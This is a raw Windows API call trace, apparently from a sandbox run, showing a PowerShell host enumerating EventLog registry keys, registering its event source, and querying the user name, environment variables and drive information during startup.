	[0294.029] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x7, lpName=0x314ad0, lpcchName=0x12d428, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12d428, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0294.029] CoTaskMemFree (pv=0x314ad0) 
	[0294.029] CoTaskMemFree (pv=0x0) 
	[0294.029] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0294.029] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x8, lpName=0x314ad0, lpcchName=0x12d428, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12d428, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0294.029] CoTaskMemFree (pv=0x314ad0) 
	[0294.029] CoTaskMemFree (pv=0x0) 
	[0294.029] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d488 | out: phkResult=0x12d488*=0x348) returned 0x0
	[0294.030] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d488 | out: phkResult=0x12d488*=0x0) returned 0x2
	[0294.030] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d488 | out: phkResult=0x12d488*=0x370) returned 0x0
	[0294.030] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d488 | out: phkResult=0x12d488*=0x0) returned 0x2
	[0294.030] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d488 | out: phkResult=0x12d488*=0x374) returned 0x0
	[0294.030] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d488 | out: phkResult=0x12d488*=0x0) returned 0x2
	[0294.030] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d488 | out: phkResult=0x12d488*=0x378) returned 0x0
	[0294.030] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d488 | out: phkResult=0x12d488*=0x0) returned 0x2
	[0294.030] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d488 | out: phkResult=0x12d488*=0x37c) returned 0x0
	[0294.030] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d488 | out: phkResult=0x12d488*=0x0) returned 0x2
	[0294.031] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d488 | out: phkResult=0x12d488*=0x380) returned 0x0
	[0294.031] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d488 | out: phkResult=0x12d488*=0x0) returned 0x2
	[0294.031] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d488 | out: phkResult=0x12d488*=0x384) returned 0x0
	[0294.031] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d488 | out: phkResult=0x12d488*=0x0) returned 0x2
	[0294.031] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d488 | out: phkResult=0x12d488*=0x388) returned 0x0
	[0294.031] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d488 | out: phkResult=0x12d488*=0x0) returned 0x2
	[0294.031] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d488 | out: phkResult=0x12d488*=0x38c) returned 0x0
	[0294.031] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d488 | out: phkResult=0x12d488*=0x390) returned 0x0
	[0294.031] RegCloseKey (hKey=0x390) returned 0x0
	[0294.032] RegCloseKey (hKey=0x36c) returned 0x0
	[0294.032] RegCloseKey (hKey=0x38c) returned 0x0
	[0294.033] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d3f8 | out: phkResult=0x12d3f8*=0x38c) returned 0x0
	[0294.033] RegQueryInfoKeyW (in: hKey=0x38c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d36c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d368, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d36c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d368*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0294.033] CoTaskMemFree (pv=0x0) 
	[0294.033] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0294.033] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x0, lpName=0x314ad0, lpcchName=0x12d3f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d3f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0294.033] CoTaskMemFree (pv=0x314ad0) 
	[0294.033] CoTaskMemFree (pv=0x0) 
	[0294.033] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0294.033] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x1, lpName=0x314ad0, lpcchName=0x12d3f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12d3f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0294.033] CoTaskMemFree (pv=0x314ad0) 
	[0294.033] CoTaskMemFree (pv=0x0) 
	[0294.033] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0294.034] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x2, lpName=0x314ad0, lpcchName=0x12d3f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12d3f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0294.034] CoTaskMemFree (pv=0x314ad0) 
	[0294.034] CoTaskMemFree (pv=0x0) 
	[0294.034] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0294.034] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x3, lpName=0x314ad0, lpcchName=0x12d3f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12d3f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0294.034] CoTaskMemFree (pv=0x314ad0) 
	[0294.034] CoTaskMemFree (pv=0x0) 
	[0294.034] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0294.034] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x4, lpName=0x314ad0, lpcchName=0x12d3f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12d3f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0294.034] CoTaskMemFree (pv=0x314ad0) 
	[0294.034] CoTaskMemFree (pv=0x0) 
	[0294.034] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0294.034] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x5, lpName=0x314ad0, lpcchName=0x12d3f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12d3f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0294.034] CoTaskMemFree (pv=0x314ad0) 
	[0294.034] CoTaskMemFree (pv=0x0) 
	[0294.034] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0294.034] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x6, lpName=0x314ad0, lpcchName=0x12d3f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12d3f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0294.034] CoTaskMemFree (pv=0x314ad0) 
	[0294.034] CoTaskMemFree (pv=0x0) 
	[0294.035] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0294.035] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x7, lpName=0x314ad0, lpcchName=0x12d3f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12d3f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0294.035] CoTaskMemFree (pv=0x314ad0) 
	[0294.035] CoTaskMemFree (pv=0x0) 
	[0294.035] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0294.035] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x8, lpName=0x314ad0, lpcchName=0x12d3f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12d3f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0294.035] CoTaskMemFree (pv=0x314ad0) 
	[0294.035] CoTaskMemFree (pv=0x0) 
	[0294.035] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d458 | out: phkResult=0x12d458*=0x36c) returned 0x0
	[0294.035] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d458 | out: phkResult=0x12d458*=0x0) returned 0x2
	[0294.035] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d458 | out: phkResult=0x12d458*=0x390) returned 0x0
	[0294.035] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d458 | out: phkResult=0x12d458*=0x0) returned 0x2
	[0294.035] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d458 | out: phkResult=0x12d458*=0x394) returned 0x0
	[0294.035] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d458 | out: phkResult=0x12d458*=0x0) returned 0x2
	[0294.036] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d458 | out: phkResult=0x12d458*=0x398) returned 0x0
	[0294.036] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d458 | out: phkResult=0x12d458*=0x0) returned 0x2
	[0294.036] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d458 | out: phkResult=0x12d458*=0x39c) returned 0x0
	[0294.036] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d458 | out: phkResult=0x12d458*=0x0) returned 0x2
	[0294.036] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d458 | out: phkResult=0x12d458*=0x3a0) returned 0x0
	[0294.036] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d458 | out: phkResult=0x12d458*=0x0) returned 0x2
	[0294.036] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d458 | out: phkResult=0x12d458*=0x3a4) returned 0x0
	[0294.614] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d458 | out: phkResult=0x12d458*=0x0) returned 0x2
	[0294.614] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d458 | out: phkResult=0x12d458*=0x3a0) returned 0x0
	[0294.614] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d458 | out: phkResult=0x12d458*=0x0) returned 0x2
	[0294.614] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d458 | out: phkResult=0x12d458*=0x36c) returned 0x0
	[0294.614] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d458 | out: phkResult=0x12d458*=0x390) returned 0x0
	[0294.615] RegCloseKey (hKey=0x390) returned 0x0
	[0294.615] RegCloseKey (hKey=0x38c) returned 0x0
	[0294.615] RegCloseKey (hKey=0x36c) returned 0x0
	[0294.620] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b9f0008
	[0295.200] ReportEventW (hEventLog=0x1b9f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e5e600*="WSMan", lpRawData=0x2e5e370) returned 1
	[0295.201] CoTaskMemAlloc (cb=0x104) returned 0x389830
	[0295.201] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389830, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.202] CoTaskMemFree (pv=0x389830) 
	[0295.206] CoTaskMemAlloc (cb=0x804) returned 0x1b919480
	[0295.206] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b919480, nSize=0x12d6e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d6e8) returned 0x1
	[0295.207] CoTaskMemFree (pv=0x1b919480) 
	[0295.207] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0295.207] GetUserNameW (in: lpBuffer=0x314ad0, pcbBuffer=0x12d728 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d728) returned 1
	[0295.207] CoTaskMemFree (pv=0x314ad0) 
	[0295.207] ReportEventW (hEventLog=0x1b9f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e63fe0*="Alias", lpRawData=0x2e63d70) returned 1
	[0295.209] CoTaskMemAlloc (cb=0x104) returned 0x389830
	[0295.209] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389830, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.209] CoTaskMemFree (pv=0x389830) 
	[0295.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.211] CoTaskMemAlloc (cb=0x804) returned 0x1b919480
	[0295.211] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b919480, nSize=0x12d6e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d6e8) returned 0x1
	[0295.211] CoTaskMemFree (pv=0x1b919480) 
	[0295.212] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0295.212] GetUserNameW (in: lpBuffer=0x314ad0, pcbBuffer=0x12d728 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d728) returned 1
	[0295.212] CoTaskMemFree (pv=0x314ad0) 
	[0295.212] ReportEventW (hEventLog=0x1b9f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e695d8*="Environment", lpRawData=0x2e69368) returned 1
	[0295.214] CoTaskMemAlloc (cb=0x104) returned 0x389830
	[0295.214] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389830, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.214] CoTaskMemFree (pv=0x389830) 
	[0295.215] CoTaskMemAlloc (cb=0x104) returned 0x389830
	[0295.215] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x389830, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0295.215] CoTaskMemFree (pv=0x389830) 
	[0295.215] CoTaskMemAlloc (cb=0x104) returned 0x389830
	[0295.215] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x389830, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0295.215] CoTaskMemFree (pv=0x389830) 
	[0295.215] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x12d290, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0295.216] SetErrorMode (uMode=0x1) returned 0x1
	[0295.216] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x12d4a0 | out: lpFileInformation=0x12d4a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0295.216] SetErrorMode (uMode=0x1) returned 0x1
	[0295.217] GetLogicalDrives () returned 0x4
	[0295.218] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12d000, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0295.219] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0295.219] SetErrorMode (uMode=0x1) returned 0x1
	[0295.220] CoTaskMemAlloc (cb=0x68) returned 0x1b9043c0
	[0295.220] CoTaskMemAlloc (cb=0x68) returned 0x1b903f60
	[0295.220] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b9043c0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x12d470, lpMaximumComponentLength=0x12d46c, lpFileSystemFlags=0x12d468, lpFileSystemNameBuffer=0x1b903f60, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12d470*=0x9c354b42, lpMaximumComponentLength=0x12d46c*=0xff, lpFileSystemFlags=0x12d468*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0295.220] CoTaskMemFree (pv=0x1b9043c0) 
	[0295.220] CoTaskMemFree (pv=0x1b903f60) 
	[0295.220] SetErrorMode (uMode=0x1) returned 0x1
	[0295.220] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0295.222] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0295.222] SetErrorMode (uMode=0x1) returned 0x1
	[0295.222] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d410 | out: lpFileInformation=0x12d410*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0295.222] SetErrorMode (uMode=0x1) returned 0x1
	[0295.222] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0295.222] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12d060, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0295.222] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0295.223] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12cf90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0295.223] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0295.224] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0295.224] SetErrorMode (uMode=0x1) returned 0x1
	[0295.224] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d240 | out: lpFileInformation=0x12d240*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0295.224] SetErrorMode (uMode=0x1) returned 0x1
	[0295.224] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0295.224] SetErrorMode (uMode=0x1) returned 0x1
	[0295.224] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d240 | out: lpFileInformation=0x12d240*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0295.225] SetErrorMode (uMode=0x1) returned 0x1
	[0295.225] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d080, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0295.225] SetErrorMode (uMode=0x1) returned 0x1
	[0295.225] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d2e0 | out: lpFileInformation=0x12d2e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0295.225] SetErrorMode (uMode=0x1) returned 0x1
	[0295.228] CoTaskMemAlloc (cb=0x804) returned 0x1b919480
	[0295.228] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b919480, nSize=0x12d6e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d6e8) returned 0x1
	[0295.228] CoTaskMemFree (pv=0x1b919480) 
	[0295.228] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0295.228] GetUserNameW (in: lpBuffer=0x314ad0, pcbBuffer=0x12d728 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d728) returned 1
	[0295.229] CoTaskMemFree (pv=0x314ad0) 
	[0295.229] ReportEventW (hEventLog=0x1b9f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e706c8*="FileSystem", lpRawData=0x2e70458) returned 1
	[0295.230] CoTaskMemAlloc (cb=0x104) returned 0x389830
	[0295.230] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389830, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.230] CoTaskMemFree (pv=0x389830) 
	[0295.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.232] CoTaskMemAlloc (cb=0x804) returned 0x1b919480
	[0295.232] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b919480, nSize=0x12d6e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d6e8) returned 0x1
	[0295.770] CoTaskMemFree (pv=0x1b919480) 
	[0295.770] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0295.770] GetUserNameW (in: lpBuffer=0x314ad0, pcbBuffer=0x12d728 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d728) returned 1
	[0295.770] CoTaskMemFree (pv=0x314ad0) 
	[0295.771] ReportEventW (hEventLog=0x1b9f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e75f08*="Function", lpRawData=0x2e75c98) returned 1
	[0295.985] CoTaskMemAlloc (cb=0x104) returned 0x389830
	[0295.986] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389830, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.986] CoTaskMemFree (pv=0x389830) 
